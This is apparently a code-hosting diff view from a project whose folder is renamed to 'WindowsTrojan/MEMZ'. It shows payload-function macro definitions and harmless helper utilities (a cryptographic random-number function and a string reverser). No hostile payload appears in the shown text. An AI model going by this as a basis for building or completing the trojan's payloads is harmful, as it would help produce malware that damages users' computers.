#define PAYLOADFUNCTIONDEFAULT(name) int name (int times, int runtime)
#define PAYLOADFUNCTIONVISUAL(name) int name (int times, int runtime, HWND hwnd, HDC hdc, LPRECT rekt, int w, int h)
#define PAYLOADHEAD
#endif
extern PAYLOAD payloads[];
extern const size_t nPayloads;

70
VCProject/MEMZ/utils.cpp → WindowsTrojan/MEMZ/utils.cpp
View file

@ -1,36 +1,36 @@
#include "memz.h"
HCRYPTPROV prov;
int random() {
if (prov == NULL)
if (!CryptAcquireContext(&prov, NULL, NULL, PROV_RSA_FULL, CRYPT_SILENT | CRYPT_VERIFYCONTEXT))
ExitProcess(1);
int out;
CryptGenRandom(prov, sizeof(out), (BYTE *)(&out));
return out & 0x7fffffff;
}
void strReverseW(LPWSTR str) {
int len = lstrlenW(str);
if (len <= 1)
return;
WCHAR c;
int i, j;
for (i = 0, j = len - 1; i < j; i++, j--) {
c = str[i];
str[i] = str[j];
str[j] = c;
}
// Fix Newlines
for (i = 0; i < len - 1; i++) {
if (str[i] == L'\n' && str[i + 1] == L'\r') {
str[i] = L'\r';
str[i + 1] = L'\n';
}
}
#include "memz.h"
HCRYPTPROV prov;
int random() {
if (prov == NULL)
if (!CryptAcquireContext(&prov, NULL, NULL, PROV_RSA_FULL, CRYPT_SILENT | CRYPT_VERIFYCONTEXT))
ExitProcess(1);
int out;
CryptGenRandom(prov, sizeof(out), (BYTE *)(&out));
return out & 0x7fffffff;
}
void strReverseW(LPWSTR str) {
int len = lstrlenW(str);
if (len <= 1)
return;
WCHAR c;
int i, j;
for (i = 0, j = len - 1; i < j; i++, j--) {
c = str[i];
str[i] = str[j];
str[j] = c;
}
// Fix Newlines
for (i = 0; i < len - 1; i++) {
if (str[i] == L'\n' && str[i + 1] == L'\r') {
str[i] = L'\r';
str[i + 1] = L'\n';
}
}
}

0
VCProject/MEMZ/win32_crt_float.cpp → WindowsTrojan/MEMZ/win32_crt_float.cpp
View file